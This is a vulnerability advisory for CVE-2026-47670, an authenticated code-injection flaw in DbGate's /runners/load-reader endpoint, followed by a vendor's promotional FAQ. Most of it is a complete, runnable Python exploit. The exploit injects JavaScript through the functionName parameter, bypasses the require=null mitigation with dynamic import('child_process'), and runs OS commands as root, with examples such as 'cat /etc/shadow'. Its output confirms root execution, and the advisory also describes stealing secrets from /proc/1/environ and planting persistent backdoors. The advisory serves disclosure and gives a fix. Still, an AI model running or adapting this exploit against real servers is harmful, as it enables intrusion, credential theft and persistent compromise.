Summary
DbGate is vulnerable to authenticated Remote Code Execution (RCE). Any user with valid DbGate credentials can execute arbitrary OS commands as root by exploiting an unsanitized functionName parameter in the /runners/load-reader endpoint. The require = null mitigation is trivially bypassed via dynamic import().
Details
Code injection via functionName in loadReader
The /runners/load-reader endpoint interpolates the functionName parameter directly into a dynamically generated JavaScript script template without any sanitization:
// packages/api/src/controllers/runners.js (loadReader / loaderScriptTemplate)
const reader = await dbgateApi.${functionName}({...});
By injecting a newline character into functionName, an attacker breaks out of the template expression and injects arbitrary JavaScript code. The injected code uses await import('child_process') to bypass the require = null mitigation (since import() is a language keyword, not a function that can be nullified), achieving arbitrary command execution as the process user (root in Docker).
The June 2025 security fix (commit cf3f95c) added require = null to the generated script, but this is trivially bypassed:
// Mitigation in generated script:
require = null;
// Bypass via dynamic import (language keyword, cannot be nullified):
const { execSync } = await import('child_process');
execSync('arbitrary command');
Root cause: functionName is user-controlled input that is interpolated into code without sanitization. The fix should validate functionName against an allowlist of known reader functions (e.g., /^[a-zA-Z]+$/) or use a lookup table instead of string interpolation.
PoC
The PoC can be run against a test environment using Docker Compose:
services:
sectest-dbgate:
image: dbgate/dbgate:7.1.4-alpine
ports:
- "80:3000"
environment:
LOGINS: admin
LOGIN_PASSWORD_admin: SuperSecretPassword123
WEB_ROOT: /
CONNECTIONS: con1
LABEL_con1: MySQL
SERVER_con1: sectest-mysql
USER_con1: dbuser
PASSWORD_con1: dbpassword
PORT_con1: 3306
ENGINE_con1: mysql@dbgate-plugin-mysql
sectest-mysql:
image: mysql:8.0
environment:
MYSQL_ROOT_PASSWORD: rootpass
MYSQL_DATABASE: testdb
MYSQL_USER: dbuser
MYSQL_PASSWORD: dbpassword
PoC Script:
#!/usr/bin/env python3
"""
DBGate, Authenticated RCE PoC
===============================
Root-level command execution against auth-enabled DBGate with valid credentials.
Vulnerability, RCE via loadReader functionName code injection
The /runners/load-reader endpoint interpolates `functionName` directly
into a dynamically generated JS script without sanitization.
A newline in functionName breaks out of the template expression and
allows arbitrary code execution as root (Docker default).
The `require = null` mitigation added in June 2025 is trivially
bypassed via dynamic `import()` (a language keyword, not a function).
Affected versions: All DbGate versions (tested on 6.1.4, 6.2.0, 7.1.4)
Fixed in: NOT FIXED as of DbGate 7.1.4
Tested on: dbgate/dbgate:7.1.4-alpine
"""
import argparse
import json
import sys
import time
import uuid
import requests
requests.packages.urllib3.disable_warnings()
COMMON_ROOTS = ["", "/dbgate", "/db", "/admin", "/gate", "/app"]
def banner(host, command, user):
print(f"""
┌─────────────────────────────────────────────────────┐
│ DBGate, Authenticated RCE PoC │
│ loadReader functionName code injection │
│ Affects ALL versions (unpatched as of 7.1.4) │
└─────────────────────────────────────────────────────┘
Target : {host}
User : {user}
Command: {command}
""")
def build_base(host, port=None):
if "://" not in host:
host = f"http://{host}"
scheme, rest = host.split("://", 1)
rest = rest.rstrip("/")
slash = rest.find("/")
if slash == -1:
hostport, path = rest, ""
else:
hostport, path = rest[:slash], rest[slash:]
if port:
hostport = hostport.rsplit(":", 1)[0] + f":{port}"
elif ":" not in hostport:
hostport += ":80"
return f"{scheme}://{hostport}", path
def discover_web_root(base_host, explicit_path=""):
if explicit_path:
return f"{base_host}{explicit_path}"
for root in COMMON_ROOTS:
url = f"{base_host}{root}"
try:
r = requests.post(f"{url}/config/get", json={},
timeout=3, verify=False)
if r.status_code == 200 and "version" in r.text:
if root:
print(f" [+] Auto-detected WEB_ROOT: {root}")
return url
except Exception:
pass
return base_host
def phase1_recon(base):
print("[Phase 1] Reconnaissance")
info = {}
try:
r = requests.post(f"{base}/config/get", json={}, timeout=5, verify=False)
if r.status_code == 200:
cfg = r.json()
info["config"] = cfg
version = cfg.get("version", "?")
print(f" [+] Version : {version}")
print(f" [+] Docker : {cfg.get('isDocker', '?')}")
print(f" [+] Data dir : {cfg.get('connectionsFilePath', '?').rsplit('/', 1)[0]}")
except Exception:
print(f" [!] /config/get failed")
try:
r = requests.post(f"{base}/auth/get-providers", json={}, timeout=5, verify=False)
if r.status_code == 200:
pdata = r.json()
info["providers"] = pdata
providers = pdata.get("providers", [])
names = [p.get("name", "?") for p in providers]
default = pdata.get("default", "?")
print(f" [+] Auth : {', '.join(names)} (default: {default})")
info["default_amoid"] = default
except Exception:
pass
print()
return info
def phase2_authenticate(base, info, user, password):
print("[Phase 2] Authentication")
amoid = info.get("default_amoid", "logins")
try:
r = requests.post(
f"{base}/auth/login",
json={"amoid": amoid, "login": user, "password": password},
timeout=5, verify=False,
)
if r.status_code == 200:
data = r.json()
token = data.get("accessToken")
if token:
print(f" [+] Authenticated as '{user}'")
print(f" [+] JWT obtained: {token[:50]}...")
print()
return token
else:
error = data.get("error", "no accessToken in response")
print(f" [-] Login failed: {error}")
else:
print(f" [-] Login failed (HTTP {r.status_code})")
except Exception as e:
print(f" [!] Login error: {e}")
print()
return None
def phase3_rce(base, token, command):
"""
RCE via loadReader functionName code injection.
functionName is interpolated into a JS script template:
const reader = await dbgateApi.{functionName}({...});
A newline in functionName breaks out and injects arbitrary code.
import() bypasses the require=null mitigation (import is a keyword).
"""
print("[Phase 3] RCE via loadReader code injection")
print(f" [*] Command: {command}")
uid = uuid.uuid4().hex[:12]
jslout = f"/tmp/_rce_{uid}.jsonl"
escaped_cmd = (command
.replace("\\", "\\\\")
.replace("'", "\\'")
.replace("`", "\\`"))
payload_fn = (
"csvReader\n"
"var _r = (await import('child_process'))"
f".execSync('{escaped_cmd}',{{timeout:30000}})"
".toString();\n"
"var NL = String.fromCharCode(10);\n"
"var _hdr = JSON.stringify({__isStreamHeader:true,"
"columns:[{columnName:'out'}]});\n"
"var _rows = _r.split(NL)"
".filter(function(l){return l.length>0})"
".map(function(l){return JSON.stringify({out:l})})"
".join(NL);\n"
f"(await import('fs')).writeFileSync('{jslout}',"
" _hdr + NL + _rows + NL);\n"
"//"
)
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json",
}
print(f" [*] Injecting payload via functionName (bypasses require=null)")
try:
r = requests.post(
f"{base}/runners/load-reader",
json={"functionName": payload_fn, "props": {}},
headers=headers,
timeout=35, verify=False,
)
print(f" [*] Payload sent (status {r.status_code})")
except requests.exceptions.Timeout:
print(f" [*] Payload sent (timed out, command may still be running)")
except requests.exceptions.ConnectionError:
print(f" [*] Payload sent (connection reset, expected for some versions)")
except Exception as e:
print(f" [!] Send error: {e}")
return None
print(f" [*] Waiting for execution...")
for wait in [0.5, 1, 1.5, 2, 3, 5]:
time.sleep(wait)
try:
r = requests.post(
f"{base}/jsldata/get-rows",
json={"jslid": f"file://{jslout}", "offset": 0, "limit": 10000},
headers=headers,
timeout=5, verify=False,
)
if r.status_code == 200:
rows = r.json()
if isinstance(rows, list) and len(rows) > 0:
print(f" [+] Output captured ({len(rows)} lines)")
print()
return "\n".join(
row.get("out", "")
for row in rows
if isinstance(row, dict)
)
except requests.exceptions.ConnectionError:
try:
time.sleep(1)
r = requests.post(
f"{base}/jsldata/get-rows",
json={"jslid": f"file://{jslout}", "offset": 0, "limit": 10000},
headers=headers,
timeout=5, verify=False,
)
if r.status_code == 200:
rows = r.json()
if isinstance(rows, list) and len(rows) > 0:
print(f" [+] Output captured ({len(rows)} lines, after reconnect)")
print()
return "\n".join(
row.get("out", "")
for row in rows
if isinstance(row, dict)
)
except Exception:
pass
except Exception:
pass
print(f" [-] Could not retrieve output (command may have failed)")
print()
return None
def main():
p = argparse.ArgumentParser(
add_help=False,
description="DBGate, Authenticated RCE PoC (loadReader code injection)",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=(
"Any authenticated DbGate user can escalate to root-level\n"
"command execution via unsanitized functionName injection.\n"
"This vulnerability is UNPATCHED as of DbGate 7.1.4.\n"
"\n"
"examples:\n"
" %(prog)s -t localhost -u admin -P 'password' -c 'id'\n"
" %(prog)s -t 10.0.0.5:3000 -u admin -P 's3cret' -c 'cat /etc/shadow'\n"
" %(prog)s -t target.internal/dbgate -u admin -P 'pass' -c 'env'\n"
),
)
p.add_argument("-t", "--target", required=True, help="Target host[:port]")
p.add_argument("-u", "--user", required=True, help="DbGate username")
p.add_argument("-P", "--password", required=True, help="DbGate password")
p.add_argument("-c", "--command", required=True, help="OS command to execute")
p.add_argument("-p", "--port", type=int, default=None, help="Override port")
if len(sys.argv) == 1:
p.print_help()
sys.exit(1)
args = p.parse_args()
base_host, path = build_base(args.target, args.port)
banner(base_host, args.command, args.user)
base = discover_web_root(base_host, path)
print(f" [*] API endpoint : {base}")
print()
info = phase1_recon(base)
if not info.get("config"):
print("[!] Cannot reach target, verify host/port/web-root")
sys.exit(1)
token = phase2_authenticate(base, info, args.user, args.password)
if not token:
print("[!] Authentication failed, check username/password")
sys.exit(1)
output = phase3_rce(base, token, args.command)
if output is not None:
print("─" * 60)
print(output.rstrip())
print("─" * 60)
print()
print("[+] RCE successful: authenticated user → root command execution")
else:
print("[!] No output captured (command may have failed or timed out)")
sys.exit(1)
if __name__ == "__main__":
main()
And running the PoC Python script (requires valid credentials):
python3 poc.py -t http://localhost -u admin -P 'SuperSecretPassword123' -c 'id'
Terminal output:
┌─────────────────────────────────────────────────────┐
│ DBGate, Authenticated RCE PoC │
│ loadReader functionName code injection │
│ Affects ALL versions (unpatched as of 7.1.4) │
└─────────────────────────────────────────────────────┘
Target : http://localhost:80
User : admin
Command: id
[*] API endpoint : http://localhost:80
[Phase 1] Reconnaissance
[+] Version : 7.1.4
[+] Docker : True
[+] Data dir : /root/.dbgate
[+] Auth : Login & Password (default: logins)
[Phase 2] Authentication
[+] Authenticated as 'admin'
[+] JWT obtained: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhbW9pZCI6I...
[Phase 3] RCE via loadReader code injection
[*] Command: id
[*] Injecting payload via functionName (bypasses require=null)
[*] Payload sent (status 500)
[*] Waiting for execution...
[+] Output captured (1 lines)
────────────────────────────────────────────────────────────
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
────────────────────────────────────────────────────────────
[+] RCE successful: authenticated user → root command execution
Impact
- Privilege escalation to root, an authenticated DbGate user escalates from web UI access to a root OS shell inside the container
- Infrastructure secret theft,
/proc/1/environexposes all container environment variables, which may include API keys, cloud tokens, and secrets beyond database credentials that are not visible through the DbGate UI - Other users' credentials, extracts
LOGIN_PASSWORD_*env vars for all DbGate users, enabling password-reuse attacks against other systems - Network pivot, from inside the container, the attacker can scan and reach other services on the network that are not exposed externally
- Persistent backdoor, root access allows modifying the DbGate application itself (e.g.
bundle.js), installing cron jobs, or adding SSH keys, the backdoor survives credential rotation and DbGate restarts
Untrusted input is inserted into a command that is later executed by the application, allowing the attacker to alter the intent of that command. Typical impact: arbitrary command execution in the application's environment.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-47670? CVE-2026-47670 is a critical-severity command injection vulnerability in dbgate-api (npm), affecting versions <= 7.1.8. It is fixed in 7.1.9. Untrusted input is inserted into a command that is later executed by the application, allowing the attacker to alter the intent of that command.
- Which versions of dbgate-api are affected by CVE-2026-47670? dbgate-api (npm) versions <= 7.1.8 is affected.
- Is there a fix for CVE-2026-47670? Yes. CVE-2026-47670 is fixed in 7.1.9. Upgrade to this version or later.
- Is CVE-2026-47670 exploitable, and should I be worried? Whether CVE-2026-47670 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-47670 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-47670? Upgrade
dbgate-apito 7.1.9 or later.